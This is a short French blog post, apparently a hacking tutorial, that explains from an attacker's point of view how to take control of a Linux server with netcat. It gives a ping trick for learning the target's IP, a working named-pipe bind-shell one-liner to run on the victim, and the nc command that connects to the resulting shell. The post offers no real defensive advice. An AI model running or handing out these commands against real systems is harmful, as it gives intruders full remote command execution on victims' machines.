[Hack] Prendre le contrôle d’un serveur en 2 mn avec NetCat

Capture

 

NC, petit utilitaire qui peut faire de la magie !!!
Petit utilitaire qui peut permettre par exemple de s’échanger des messages ...
Mais aussi petit utilitaire qui peut ouvrir votre porte à n'importe quelle personne Malveillante...

 

Windows l'a bien compris, et le désactive par défaut ... ainsi, libre à l'utilisateur, en connaissance de risque de l'activer ...

 

NC ....

 

Comme j'ai pu vous le montrer précédemment, il est relativement simple de savoir qui vous ping ...

 

Aussi, mettons-nous dans la peau d'un pirate qui souhaite récupérer la vraie  IP de sa cible  ... en appliquant cette méthode : [Hack] Qui vous Ping ?!?

Capture

L'idée étant, qu'un pirate ... parvienne à exécuter un ping vers son ordinateur / serveur, depuis la machine qu'il cible

ping 37.76.55.195

 

... S'il y parvient, il n'a plus qu'à attendre de recevoir le ping

 

Capture

 

Dès lors qu'il connaît l'adresse IP ...

De la même manière qu'il est parvenu à exécuter le ping, il va exécuter la commande suivante sur la machine de sa victime :

 rm backpipe -f;mknod backpipe p && nc -l 1234 0<backpipe | /bin/bash 1>backpipe 

1234 étant un port pour l'exemple, vous pouvez en mettre un autre ;) )

Ce qui ouvrira les portes de sa victime (un Shell), et lui permettra d'avoir un contrôle total ... ou presque ...

Pour terminer ... il n'aura plus qu'à exécuter cette commande depuis son ordinateur :

nc -v 74.37.55.159 1234

Ayant pour effet, de le connecter directement au Shell de l'hôte distant ...

Capture2

Plus dans le détail :

NC recevra du texte (les commandes envoyées par l'attaquant), il le redirigera alors vers l’interpréteur de commande, ici "/bin/bash".
En recevant ce texte, bash l’exécutera, et la sortie (l'affichage) sera alors non pas affiché ... mais redirigé vers l'attaquant ...

Partagez ce contenu

7 comments

Répondre à Jenna Annuler la réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *